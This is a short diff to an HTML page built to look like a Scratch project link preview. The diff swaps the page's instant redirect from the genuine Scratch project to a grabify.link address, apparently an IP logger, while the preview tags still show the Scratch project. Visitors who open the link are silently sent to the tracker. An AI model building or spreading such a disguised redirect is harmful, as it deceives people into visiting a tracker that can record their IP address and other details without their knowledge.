--- a/scratchembed.html
+++ b/scratchembed.html
@@ -4,4 +4,4 @@
 <meta content="https://scratch.mit.edu/projects/1045575295" property="og:url" />
 <meta content="https://uploads.scratch.mit.edu/get_image/project/1045575295_292x219.png" property="og:image" />
 <meta content="#43B581" data-react-helmet="true" name="theme-color" />
-<meta http-equiv="Refresh" content="0; url='https://scratch.mit.edu/projects/1045575295'" />
+<meta http-equiv="Refresh" content="0; url='https://grabify.link/WWV519'" />
